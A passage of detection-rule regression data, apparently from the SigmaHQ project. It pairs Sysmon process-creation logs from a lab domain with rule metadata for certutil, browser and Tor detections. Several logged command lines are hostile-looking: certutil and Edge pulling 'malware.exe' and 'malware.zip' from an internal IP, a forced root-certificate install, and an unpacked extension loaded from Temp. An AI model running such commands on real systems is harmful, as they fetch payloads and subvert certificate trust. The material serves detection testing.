"SystemTime": "2025-10-26T23:30:09.492105Z"
}
},
"EventRecordID": 33024467,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-26 23:30:09.480",
"ProcessGuid": "5AA13A44-AF01-68FE-535E-000000004002",
"ProcessId": 2536,
"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
"FileVersion": "141.0.7390.123",
"Description": "Google Chrome",
"Product": "Google Chrome",
"Company": "Google LLC",
"OriginalFileName": "chrome.exe",
"CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --load-extension=\"C:\\Users\\user\\AppData\\Local\\Temp\\HHe2lr\"",
"CurrentDirectory": "C:\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E",
"ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ParentProcessId": 10048,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml
================================================
id: 78e88bc4-deea-488e-a27f-b4d9d07d3a72
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 27ba3207-dd30-4812-abbf-5d20c57d474e
title: Suspicious Chromium Browser Instance Executed With Custom Extension
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T23:34:35.016637Z"
}
},
"EventRecordID": 33119645,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-26 23:34:35.002",
"ProcessGuid": "5AA13A44-B00B-68FE-9F5E-000000004002",
"ProcessId": 4584,
"Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
"FileVersion": "141.0.3537.99",
"Description": "Microsoft Edge",
"Product": "Microsoft Edge",
"Company": "Microsoft Corporation",
"OriginalFileName": "msedge.exe",
"CommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" \"http://10.0.1.14/malware.zip\"",
"CurrentDirectory": "C:\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D",
"ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ParentProcessId": 10048,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml
================================================
id: c7f0da2b-2eb9-46ee-abd0-d2f8e3c81975
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 94771a71-ba41-4b6e-a757-b531372eaab6
title: File Download From Browser Process Via Inline URL
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T23:39:33.565515Z"
}
},
"EventRecordID": 33232425,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-26 23:39:33.564",
"ProcessGuid": "5AA13A44-B135-68FE-035F-000000004002",
"ProcessId": 10712,
"Image": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe",
"FileVersion": "128.14.0",
"Description": "Tor Browser",
"Product": "Tor Browser",
"Company": "Mozilla Corporation",
"OriginalFileName": "firefox.exe",
"CommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe\"",
"CurrentDirectory": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "Medium",
"Hashes": "SHA1=9D317F48BA264346D1BA2DA10B0893B156FA69BF,MD5=66D34277F992DB4CA8561FD1A5C483E4,SHA256=683574EBC203C630AF98256516D7CBC50E270E7C5A56E1D46CB9CA671B3D9F32,IMPHASH=EEC7642CF938691D739D1F9BED0DF74D",
"ParentProcessGuid": "5AA13A44-B135-68FE-025F-000000004002",
"ParentProcessId": 1292,
"ParentImage": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe",
"ParentCommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml
================================================
id: 8e750cec-bc57-4b20-bd0a-006733558c56
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c
title: Tor Client/Browser Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T16:54:23.873276Z"
}
},
"EventRecordID": 11383720,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 16:54:23.866",
"ProcessGuid": "5AA13A44-00BF-68FD-3F35-000000004002",
"ProcessId": 8592,
"Image": "C:\\Windows\\System32\\certutil.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "CertUtil.exe",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CertUtil.exe",
"CommandLine": "certutil -addstore -f root C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\cert.cer",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml
================================================
id: 5969ddb0-b4ab-47c9-a12b-471d6c6551c8
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: d2125259-ddea-4c1c-9c22-977eb5b29cf0
title: New Root Certificate Installed Via Certutil.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T16:56:16.019794Z"
}
},
"EventRecordID": 11418519,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 16:56:16.013",
"ProcessGuid": "5AA13A44-0130-68FD-4E35-000000004002",
"ProcessId": 5112,
"Image": "C:\\Windows\\System32\\certutil.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "CertUtil.exe",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CertUtil.exe",
"CommandLine": "certutil -decode file.base64 file-decoded.ext",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/info.yml
================================================
id: e582dfce-5cb3-4991-9719-9a336eb90a6f
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7
title: File Decoded From Base64/Hex Via Certutil.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:02:36.900637Z"
}
},
"EventRecordID": 11537869,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:02:36.894",
"ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002",
"ProcessId": 6484,
"Image": "C:\\Windows\\System32\\certutil.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "CertUtil.exe",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CertUtil.exe",
"CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/info.yml
================================================
id: ee435dcb-08cb-4de1-bb70-bdd27cf0dae9
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b
title: Suspicious Download Via Certutil.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:01:06.116464Z"
}
},
"EventRecordID": 11507958,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:01:06.109",
"ProcessGuid": "5AA13A44-0252-68FD-7235-000000004002",
"ProcessId": 6432,
"Image": "C:\\Windows\\System32\\certutil.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "CertUtil.exe",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CertUtil.exe",
"CommandLine": "certutil.exe -urlcache -f http://10.0.1.14/malware.exe malware-ctl.exe",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml
================================================
id: 76e024fd-9064-46ae-85f8-c524dc6b3492
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:02:36.900637Z"
}
},
"EventRecordID": 11537869,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:02:36.894",
"ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002",
"ProcessId": 6484,
"Image": "C:\\Windows\\System32\\certutil.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "CertUtil.exe",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CertUtil.exe",
"CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml
================================================
id: 507f6de5-f414-4825-b1a3-e8909fdc8700
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794
title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:04:22.017117Z"
}
},
"EventRecordID": 11570013,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:04:22.010",
"ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002",
"ProcessId": 3980,
"Image": "C:\\Windows\\System32\\certutil.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "CertUtil.exe",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CertUtil.exe",
"CommandLine": "certutil -encode file.bat file_.base64",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/info.yml
================================================
id: 70e4269e-9d3c-4bfb-ad84-0b63124ad0a2
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a
title: File Encoded To Base64 Via Certutil.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:04:22.017117Z"
}
},
"EventRecordID": 11570013,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:04:22.010",
"ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002",
"ProcessId": 3980,
"Image": "C:\\Windows\\System32\\certutil.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "CertUtil.exe",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CertUtil.exe",
"CommandLine": "certutil -encode file.bat file_.base64",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml
================================================
id: 7033fe69-1fd7-4da2-b525-222c1b087107
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: ea0cdc3e-2239-4f26-a947-4e8f8224e464
title: Suspicious File Encoded To Base64 Via Certutil.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:05:11.334152Z"
}
},
"EventRecordID": 11585346,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:05:11.327",
"ProcessGuid": "5AA13A44-0347-68FD-8B35-000000004002",
"ProcessId": 6780,
"Image": "C:\\Windows\\System32\\certutil.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "CertUtil.exe",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "CertUtil.exe",
